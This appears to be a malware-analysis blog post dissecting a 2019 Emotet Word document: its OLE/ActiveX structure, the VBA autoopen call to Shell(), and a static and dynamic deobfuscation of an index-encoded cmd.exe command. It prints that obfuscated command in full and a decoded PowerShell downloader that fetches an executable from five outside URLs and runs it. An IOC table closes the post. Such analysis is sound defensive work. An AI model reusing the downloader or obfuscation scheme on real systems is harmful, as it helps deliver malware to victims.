Malicious Office documents are by far the most prevalent method of infiltrating malware into internal organization networks. Email-based attacks deliver the malicious Office document, the end user opens it, and malicious code runs on the host in the context of the current user session.
Attackers target every sector and type of organization; up to 2021, employees received on average 31 phishing emails per year.
Therefore it is imperative that IT specialists, security professionals, analysts, engineers and so on know how to handle malicious documents and analyze them properly.
In this post we give an example of how to analyze Office Word documents, in this case a Word document weaponized with a malicious OLE object that downloads an Emotet malware payload.
Below is the opened Word document with the "Enable Content" warning:
It is a known fact that regular non-technical users will click the button in most cases. Once clicked, malicious VBA (Visual Basic for Applications) code will be executed in the background, spawning a chain of malicious commands resulting in payload downloading and installation.
We will focus on the Word Document itself rather than the payload (the server from which the executable payload is fetched is offline nowadays, as the sample was first seen in 2019).
The Word document file format used here is OLE (Object Linking and Embedding), a very common container format in Microsoft Office used to add interaction and features to documents: it allows a document to embed other objects and invoke their functionality when the document is opened.
For a thorough explanation of OLE, refer to the Microsoft documentation on OLE background:
"OLE documents, historically called compound documents, seamlessly integrate various types of data, or components. Sound clips, spreadsheets, and bitmaps are typical examples of components found in OLE documents. Supporting OLE in your application allows your users to use OLE documents without worrying about switching between the different applications; OLE does the switching for you."
OLE files are identified by their own magic bytes (binary signature) at offset 0: 0xD0CF11E0A1B11AE1
Finding the Embedded OLE Object
When eyeballing the document, a tiny text box was spotted. It is there for a reason. The malicious document code consists of a combination of VBA macros and malicious ActiveX controls:
When zooming into the text box (the ActiveX control), the beginning of what seems to be a cmd.exe command pops out.
At this point we dig into the VBA project inside the document to get a better look at the code. As mentioned earlier, the malicious functionality is a combination of VBA code and an ActiveX control (in this case a Text Box form object). We will get to analyzing the VBA macros later in this post.
Notice the location of the OLE object streams:
a.doc (the document) -> a (root OLE storage) -> ObjectPool (common storage name where embedded OLE objects are located) -> _1606938108:
Every stream has its own role in the play. In the next section we will elaborate on each stream and its contents, along with some important background on the embedded OLE object structure.
\001CompObj
The root stream of the OLE object containing general information on the object and its type:
\003ObjInfo
Stores what is referred to as the ODT structure.
The structure is 6 bytes long (three little-endian 16-bit words):
0x1200, 0x0003, 0x0004
Microsoft documentation on the ODT structure.
First word: ODTPersist1 = 0x1200
Looking at the binary representation of 0x1200 (0001 0010 0000 0000), the "J" and "M" bits are set. The "M" bit is the more telling one: it marks the object as a reusable software module, better known as an ActiveX control:
Second word: cf = 0x0003
A cf value of 0x0003 indicates that the embedded object's format is "Metafile" or "Enhanced Metafile". To determine which of the two, we need the ODTPersist2 structure.
Last word: ODTPersist2 = 0x0004 (binary: 0100)
This is the bit that specifies whether the application that saved this Word binary file queried the OLE object to determine whether it supports the Enhanced Metafile format:
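As an added example (not code from the original post), here is a small Python parser for the 6-byte ODT structure discussed above, plus the OLE magic-byte check from earlier. The field and flag names follow MS-DOC (ODTPersist1, cf, ODTPersist2); the sample bytes are constructed from the three words the post reports, and the olefile call in the comment is an assumption about how you would read the real stream.

```python
import struct

OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")   # compound file header signature

# Constructed sample: the three little-endian words the post reports for the
# \x03ObjInfo stream (ODTPersist1=0x1200, cf=0x0003, ODTPersist2=0x0004).
# From a real file (assumed usage of the olefile library, not run here):
#   olefile.OleFileIO(path).openstream(
#       ["ObjectPool", "_1606938108", "\x03ObjInfo"]).read()
OBJINFO_SAMPLE = struct.pack("<HHH", 0x1200, 0x0003, 0x0004)

# Subset of the ODTPersist1 flag bits (MS-DOC 2.9.176). The letters are the
# labels of the spec's bit diagram, with A being bit 0 (least significant).
ODT_PERSIST1_BITS = {
    1: "fDefHandler",         # B
    4: "fLink",               # E: object is linked rather than embedded
    6: "fIcon",               # G: displayed as an icon
    7: "fIsOle1",             # H: OLE 1 only
    8: "fManual",             # I: manual update (links only)
    9: "fRecomposeOnResize",  # J
    12: "fOCX",               # M: object is an OLE (ActiveX) control
}

# cf: the clipboard format the object uses to hand data to Word
CF_NAMES = {1: "RTF", 2: "Text", 3: "Metafile or Enhanced Metafile",
            4: "Bitmap", 5: "DIB", 0x0A: "HTML", 0x14: "Unicode text"}


def is_ole(data):
    """True when the buffer starts with the OLE compound file magic bytes."""
    return data[:8] == OLE_MAGIC


def parse_odt(objinfo):
    """Decode the ODT structure at the start of an ObjInfo stream."""
    if len(objinfo) < 6:
        raise ValueError("ObjInfo stream is shorter than an ODT structure")
    persist1, cf, persist2 = struct.unpack("<HHH", objinfo[:6])
    flags = [name for bit, name in ODT_PERSIST1_BITS.items()
             if (persist1 >> bit) & 1]
    return {
        "ODTPersist1": persist1,
        "flags": flags,
        "is_activex": "fOCX" in flags,
        "cf": cf,
        "cf_name": CF_NAMES.get(cf, "unknown"),
        "ODTPersist2": persist2,
        "fEMF": bool(persist2 & 0x0001),          # A: object uses EMF
        "fQueriedEMF": bool(persist2 & 0x0004),   # C: Word asked about EMF support
        "fStoredAsEMF": bool(persist2 & 0x0008),  # D: presentation stored as EMF
    }


if __name__ == "__main__":
    print(parse_odt(OBJINFO_SAMPLE))
```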
\003OCXNAME
The name of the ActiveX control object - "TextBox1"
\003PRINT
This stream can be seen as the display image printed on the text box - "cmd /c %PrOG"
(The text box when enlarged, as seen earlier)
contents
The actual contents stored in the Text Box, in this case the malicious command itself.
The stream holds a cmd.exe command whose payload is a long list of decimal numbers. Each number is an index into a character table stored in an environment variable, so the real command is rebuilt one character at a time only at runtime; the result is then piped ("|") to a second cmd.exe instance that executes it.
VBA Macros Analysis
The text box is located under the "Microsoft Word Objects" Storage.
The VBA execution flow is as follows:
Document is opened by the user.
The "Enable Content" button is clicked by the user, causing the macros to run.
The malicious ActiveX control, the embedded OLE object, is loaded by the Word document. The ActiveX control is a TextBox1 form object that stores a malicious obfuscated command.
The text box object under the VBA macros project holds the "autoopen()" function. This is the entry point of the VBA code.
The "autoopen()" function executes another function named "s1045119()". This function is highly obfuscated. The only meaningful line of code is inside the "Shell()" built-in function, which executes the contents of the "contents" OLE stream:
h323333912 = Array(M0030391, i637107329, d58358, Interaction.Shell(("" + v5804520 + Q73263 + Z34707 + L69789720701213.TextBox1) + H92859 + z93782 + J597939 + V37335, 58 - 58), k36488, H400255, N44599)
Deobfuscation and Analysis of the Malicious Commands
The "contents" OLE stream stores the malicious command that is executed once the document is opened.
We addressed the deobfuscation part dynamically, letting the code do the job for us, with slight modifications to avoid executing the Emotet payload.
Malicious shell command in the "contents" stream:
cmd /c %PrOGrAMDATA:~0,1%%prOGraMdata:~9,2% /V: /C "sET ZRX4=OUj=/a~',b1%-h.)CSlN dtY8PiR6oM4Arxwnuy\KfDX:J{mg}GEp$L+5Wk9IB2ce7F;3v0(Ts@&&FOR %n In ( 52 , 29 , 35, 11 ,25 , 1, 61 , 54 ,60 , 16 ,44 , 6,56, 8 ,10, 11 , 33, 11 , 17 ,51 ,17, 17 , 60 ,0 , 19 ,19 , 32 , 30 , 51 , 44, 6 , 12 , 31,8 ,10, 11, 13 , 11 , 72 , 51,30 , 25 , 44 , 6 , 12 , 68, 8 , 10 , 11, 18 , 18 ,20 , 53 , 26,28 , 24 , 70 ,3 , 7 ,35 , 31 ,65, 59 , 7 ,67 , 53 , 36 , 65 , 62, 70 , 3 ,36 , 64 ,35 , 12 , 29 , 9 ,2 ,64 , 63 , 22 , 20 , 19 , 64 , 22 , 14 , 57 , 64 , 9 ,16 , 18 , 26 , 64, 36 ,22,67 ,53 ,9 , 68 , 28 , 24 , 3, 7 , 13 , 22, 22 , 52 , 44 , 4 , 4, 2 , 29 , 13 , 36 , 36 , 38 ,63, 33 , 5 , 52 , 14 , 63, 29 , 47 , 4, 13 ,29 , 10 , 52 , 13 , 70 , 36 ,2 , 21,74 , 13 , 22 ,22 , 52 , 44 ,4, 4 , 58 , 26 , 21 , 73 , 12 ,64 , 21,37 , 63 , 5 , 22 , 26 , 29 , 36 ,12 , 73 , 37, 52 , 52 , 29 , 33 ,22 , 14 , 63, 29 , 47 , 4 ,54 ,27 ,18 , 10, 56,16, 23 , 74 , 13 , 22 , 22 , 52 ,44 , 4, 4 , 22 , 29, 33, 22 ,37 , 48 ,5, 21, 5, 22 , 5 ,63 , 29 , 33 , 52 , 14 , 63 , 29 ,47 , 4 , 40 ,68 , 23, 65 , 26 , 21 , 52 , 74 ,13 ,22, 22, 52 , 44 , 4 , 4 , 33 ,64,5, 18 , 26 ,22 ,38 , 63 , 29 , 47 , 52 , 37 , 22 , 64 ,33, 73 , 14, 36 , 18, 4 , 16 , 43 ,62 ,26 , 9 , 34, 27, 56 , 33 ,31, 74 , 13 , 22 , 22, 52 , 44, 4, 4 , 2 ,5 , 73 , 52 , 26 , 36 , 41 , 29 , 33 , 47 , 5 , 22 , 26 , 63,5 , 14 , 63 , 29, 47 , 4,73 , 21, 54 , 24 , 73 , 65 , 13 , 48, 7 ,14 , 17, 52 , 18 , 26, 22 , 71 , 7 , 74 , 7, 15 , 67 , 53 , 27 , 65 ,70 ,10 , 3 , 7 , 69 ,68 , 31, 65,7,67 , 53 , 18, 70 , 31 , 10, 20 , 3 , 20 , 7 , 68 , 65 ,10 , 7, 67 , 53 ,40 , 62, 70 , 28 , 3, 7 , 45 , 59,28 , 31 , 7 , 67 , 53 , 35 , 56, 62, 56 , 3,53,64 ,36, 69, 44 , 52 , 37 , 9 , 18 ,26 , 63 ,55 , 7 , 39 , 7 , 55 , 53, 18 , 70 , 31 ,10 , 55 , 7 , 14, 64, 34 , 64,7 , 67 ,41, 29 , 33 , 64 ,5 , 63, 13 , 71 , 53, 37 ,24 , 65 , 65 , 20 , 26 , 36 , 20 , 53 , 9 , 68 ,28 , 24 ,15 , 46, 22 , 33 , 38 , 46 , 53 , 36 , 65, 62, 70 ,14 , 42, 29 , 35 , 36 ,18 , 29, 5 , 21, 66 , 26, 18 , 
64 , 71 , 53 , 37 , 24 , 65, 65 , 8 , 20, 53 , 35 , 56 , 62 , 56 , 15, 67 , 53 ,0 , 10 , 65 , 10, 3 , 7 , 21 , 28 , 70 , 68,7 , 67 , 60 , 41 ,20 , 71 , 71 , 50 , 64 ,22 , 12 ,60 , 22 , 64, 47 , 20 , 53 , 35 ,56 ,62 , 56,15 , 14 , 18 ,64 , 36 ,48 ,22 , 13 , 20 , 12 ,48 , 64 , 20 , 24 , 70 , 70 , 70, 70 , 15 , 20 , 46 ,60, 36 , 69, 29 , 58 ,64,12 , 60 , 22,64,47 , 20 , 53 , 35 , 56 , 62, 56, 67, 53 , 42,24 , 24, 28 , 3 ,7 ,63 , 62 ,62 , 68 ,7 , 67, 9,33 ,64 ,5, 58 , 67, 49 , 49 , 63 , 5 , 22,63 , 13 , 46 , 49 , 49 ,53 , 21, 65 ,65, 59 ,3, 7 , 1 ,24 , 31 , 59 , 7,67 ,80 )DO seT HS=!HS!!ZRX4:~ %n, 1!&if %n GEq 80 ECho !HS:~ 4! | CMD"
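The index scheme described above (in the "contents" section and in the command just shown) can also be undone statically, without running it. The following Python decoder is an added example, not code from the original post: it pulls out the three parts the command is built from (the sET NAME=<table> character table, the FOR %n In ( ... ) index list, and the closing if %n GEq N ECho !HS:~ K! that emits the accumulated string minus K leading characters) and rebuilds the text the loop would hand to the second cmd.exe. The embedded command is a constructed sample with the same shape as the real one, not the Emotet command; the function accepts the text of the contents stream as well.

```python
import re

# Constructed sample shaped like the command in the "contents" stream (not the
# Emotet command): a scrambled character table in an environment variable, a
# list of positions into it, and a final ECho that pipes the rebuilt text to a
# second cmd.exe. The leading %PrOGrAMDATA:~0,1%%prOGraMdata:~9,2% spells
# "CmD" out of the characters of C:\ProgramData.
SAMPLE_CMD = (
    'cmd /c %PrOGrAMDATA:~0,1%%prOGraMdata:~9,2% /V: /C "sET K9=Gtl@ase-hDp$wjro k'
    '&&FOR %n In ( 13 , 3 ,17, 11 , 10 , 15 ,12 , 6 , 14 , 5 , 8 , 6 , 2 ,2 , 16 ,'
    ' 0 , 6 , 1 , 7 , 9 , 4 , 1 , 6 ,40 )DO seT HS=!HS!!K9:~ %n, 1!'
    '&if %n GEq 40 ECho !HS:~ 4! | CMD"'
)


def decode_index_loop(cmd_text):
    """Rebuild the string that the FOR loop assembles, without executing it."""
    m = re.search(r'\bset\s+(\w+)=(.*?)&&for\b', cmd_text, re.I | re.S)
    if not m:
        raise ValueError("no 'set NAME=<table>&&FOR' found")
    table_var, table = m.group(1), m.group(2)
    if not re.search(r'!%s:~' % re.escape(table_var), cmd_text, re.I):
        raise ValueError("loop body does not index " + table_var)
    m = re.search(r'\bin\s*\((.*?)\)\s*do\b', cmd_text, re.I | re.S)
    if not m:
        raise ValueError("no 'FOR %n In ( ... ) DO' index list found")
    indexes = [int(n) for n in re.findall(r'\d+', m.group(1))]
    # 'if %n GEq N' decides on which iteration the ECho fires
    m = re.search(r'\bgeq\s+(\d+)', cmd_text, re.I)
    threshold = int(m.group(1)) if m else max(indexes)
    # ':~ K' on the ECho drops K leading characters (cmd substring syntax)
    m = re.search(r'\becho\s+!\w+:~\s*(-?\d+)!', cmd_text, re.I)
    skip = int(m.group(1)) if m else 0

    out = []
    for n in indexes:
        out.append(table[n:n + 1])   # '' when past the end, exactly like cmd
        if n >= threshold:
            break                    # the ECho runs on this iteration
    return "".join(out)[skip:]


if __name__ == "__main__":
    print(decode_index_loop(SAMPLE_CMD))   # powershell Get-Date
```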
Defanged command:
(the trailing "| CMD" was removed so the output is not piped to cmd.exe and executed)
cmd /c %PrOGrAMDATA:~0,1%%prOGraMdata:~9,2% /V: /C "sET ZRX4=OUj=/a~',b1%-h.)CSlN dtY8PiR6oM4Arxwnuy\KfDX:J{mg}GEp$L+5Wk9IB2ce7F;3v0(Ts@&&FOR %n In ( 52 , 29 , 35, 11 ,25 , 1, 61 , 54 ,60 , 16 ,44 , 6,56, 8 ,10, 11 , 33, 11 , 17 ,51 ,17, 17 , 60 ,0 , 19 ,19 , 32 , 30 , 51 , 44, 6 , 12 , 31,8 ,10, 11, 13 , 11 , 72 , 51,30 , 25 , 44 , 6 , 12 , 68, 8 , 10 , 11, 18 , 18 ,20 , 53 , 26,28 , 24 , 70 ,3 , 7 ,35 , 31 ,65, 59 , 7 ,67 , 53 , 36 , 65 , 62, 70 , 3 ,36 , 64 ,35 , 12 , 29 , 9 ,2 ,64 , 63 , 22 , 20 , 19 , 64 , 22 , 14 , 57 , 64 , 9 ,16 , 18 , 26 , 64, 36 ,22,67 ,53 ,9 , 68 , 28 , 24 , 3, 7 , 13 , 22, 22 , 52 , 44 , 4 , 4, 2 , 29 , 13 , 36 , 36 , 38 ,63, 33 , 5 , 52 , 14 , 63, 29 , 47 , 4, 13 ,29 , 10 , 52 , 13 , 70 , 36 ,2 , 21,74 , 13 , 22 ,22 , 52 , 44 ,4, 4 , 58 , 26 , 21 , 73 , 12 ,64 , 21,37 , 63 , 5 , 22 , 26 , 29 , 36 ,12 , 73 , 37, 52 , 52 , 29 , 33 ,22 , 14 , 63, 29 , 47 , 4 ,54 ,27 ,18 , 10, 56,16, 23 , 74 , 13 , 22 , 22 , 52 ,44 , 4, 4 , 22 , 29, 33, 22 ,37 , 48 ,5, 21, 5, 22 , 5 ,63 , 29 , 33 , 52 , 14 , 63 , 29 ,47 , 4 , 40 ,68 , 23, 65 , 26 , 21 , 52 , 74 ,13 ,22, 22, 52 , 44 , 4 , 4 , 33 ,64,5, 18 , 26 ,22 ,38 , 63 , 29 , 47 , 52 , 37 , 22 , 64 ,33, 73 , 14, 36 , 18, 4 , 16 , 43 ,62 ,26 , 9 , 34, 27, 56 , 33 ,31, 74 , 13 , 22 , 22, 52 , 44, 4, 4 , 2 ,5 , 73 , 52 , 26 , 36 , 41 , 29 , 33 , 47 , 5 , 22 , 26 , 63,5 , 14 , 63 , 29, 47 , 4,73 , 21, 54 , 24 , 73 , 65 , 13 , 48, 7 ,14 , 17, 52 , 18 , 26, 22 , 71 , 7 , 74 , 7, 15 , 67 , 53 , 27 , 65 ,70 ,10 , 3 , 7 , 69 ,68 , 31, 65,7,67 , 53 , 18, 70 , 31 , 10, 20 , 3 , 20 , 7 , 68 , 65 ,10 , 7, 67 , 53 ,40 , 62, 70 , 28 , 3, 7 , 45 , 59,28 , 31 , 7 , 67 , 53 , 35 , 56, 62, 56 , 3,53,64 ,36, 69, 44 , 52 , 37 , 9 , 18 ,26 , 63 ,55 , 7 , 39 , 7 , 55 , 53, 18 , 70 , 31 ,10 , 55 , 7 , 14, 64, 34 , 64,7 , 67 ,41, 29 , 33 , 64 ,5 , 63, 13 , 71 , 53, 37 ,24 , 65 , 65 , 20 , 26 , 36 , 20 , 53 , 9 , 68 ,28 , 24 ,15 , 46, 22 , 33 , 38 , 46 , 53 , 36 , 65, 62, 70 ,14 , 42, 29 , 35 , 36 ,18 , 29, 5 , 21, 66 , 26, 18 , 
64 , 71 , 53 , 37 , 24 , 65, 65 , 8 , 20, 53 , 35 , 56 , 62 , 56 , 15, 67 , 53 ,0 , 10 , 65 , 10, 3 , 7 , 21 , 28 , 70 , 68,7 , 67 , 60 , 41 ,20 , 71 , 71 , 50 , 64 ,22 , 12 ,60 , 22 , 64, 47 , 20 , 53 , 35 ,56 ,62 , 56,15 , 14 , 18 ,64 , 36 ,48 ,22 , 13 , 20 , 12 ,48 , 64 , 20 , 24 , 70 , 70 , 70, 70 , 15 , 20 , 46 ,60, 36 , 69, 29 , 58 ,64,12 , 60 , 22,64,47 , 20 , 53 , 35 , 56 , 62, 56, 67, 53 , 42,24 , 24, 28 , 3 ,7 ,63 , 62 ,62 , 68 ,7 , 67, 9,33 ,64 ,5, 58 , 67, 49 , 49 , 63 , 5 , 22,63 , 13 , 46 , 49 , 49 ,53 , 21, 65 ,65, 59 ,3, 7 , 1 ,24 , 31 , 59 , 7,67 ,80 )DO seT HS=!HS!!ZRX4:~ %n, 1!&if %n GEq 80 ECho !HS:~ 4!" > out.txt
Instead of piping the output to cmd.exe, it was redirected to a file (out.txt) so the deobfuscated command could be examined before anything is executed:
(beginning of out.txt contents)
Obfuscated command execution:
Output:
(output continuation)
The output is a second-stage PowerShell downloader that fetches the Emotet payload and saves it to "C:\Users\Public\371.exe":
PowerShell command:
PowerShell $i680='w479';$n720=new-object Net.WebClient;$b368='hxxp[:]//johnnycrap.com/ho1ph0njd@hxxp[:]//kids-education-support.com/LRl15CY@hxxp[:]//tortugadatacorp.com/K3Y7idp@hxxp[:]//realitycomputers.nl/CX2ibxR5r4@hxxp[:]//jaspinformatica.com/sdL8s7hg'.Split('@');$R701='v347';$l041 = '371';$K206='J964';$w525=$env:public+'\'+$l041+'.exe';foreach($u877 in $b368){try{$n720.DownloadFile($u877, $w525);$O171='d603';If ((Get-Item $w525).length -ge 80000) {Invoke-Item $w525;$D886='c223';break;}}catch{}}$d779='U849';
Clean PowerShell code:
$n720=new-object Net.WebClient;
$b368='hxxp[:]//johnnycrap.com/ho1ph0njd@hxxp[:]//kids-education-support.com/LRl15CY@hxxp[:]//tortugadatacorp.com/K3Y7idp@hxxp[:]//realitycomputers.nl/CX2ibxR5r4@hxxp[:]//jaspinformatica.com/sdL8s7hg'.Split('@');
$l041 = '371';
$w525=$env:public+'\'+$l041+'.exe';
foreach($u877 in $b368){
    try{
        $n720.DownloadFile($u877, $w525);
        If ((Get-Item $w525).length -ge 80000) {
            Invoke-Item $w525;
            break;
        }
    }catch{}
}
Defanged command:
(only attempts to download the payload, without executing it)
$n720=new-object Net.WebClient;
$b368='hxxp[:]//johnnycrap.com/ho1ph0njd@hxxp[:]//kids-education-support.com/LRl15CY@hxxp[:]//tortugadatacorp.com/K3Y7idp@hxxp[:]//realitycomputers.nl/CX2ibxR5r4@hxxp[:]//jaspinformatica.com/sdL8s7hg'.Split('@');
$l041 = '371';
$w525=$env:public+'\'+$l041+'.exe';
foreach($u877 in $b368){
    $n720.DownloadFile($u877, $w525);
}
Execution of the defanged command was unsuccessful:
Due to the sample being relatively old (2019), the Emotet payload URLs are offline. This post was focused on the analysis of the Word document itself, the way it invokes a malicious shell command from the contents of an ActiveX control - an embedded OLE object.
We hope you enjoyed the content :)
See you in the next blog post on malicious Office document analysis.
Indicators of Compromise
Indicator | Description |
422d8a97b75426b9725b6a0f6a9ecb1818160dc931140b7615e38c5a62ecaad7 | Maldoc SHA-256 |
a.doc | Maldoc filename |
hxxp[:]//johnnycrap[.]com/ho1ph0njd | Emotet payload URL |
hxxp[:]//kids-education-support[.]com/LRl15CY | Emotet payload URL |
hxxp[:]//tortugadatacorp[.]com/K3Y7idp | Emotet payload URL |
hxxp[:]//realitycomputers[.]nl/CX2ibxR5r4 | Emotet payload URL |
hxxp[:]//jaspinformatica[.]com/sdL8s7hg | Emotet payload URL |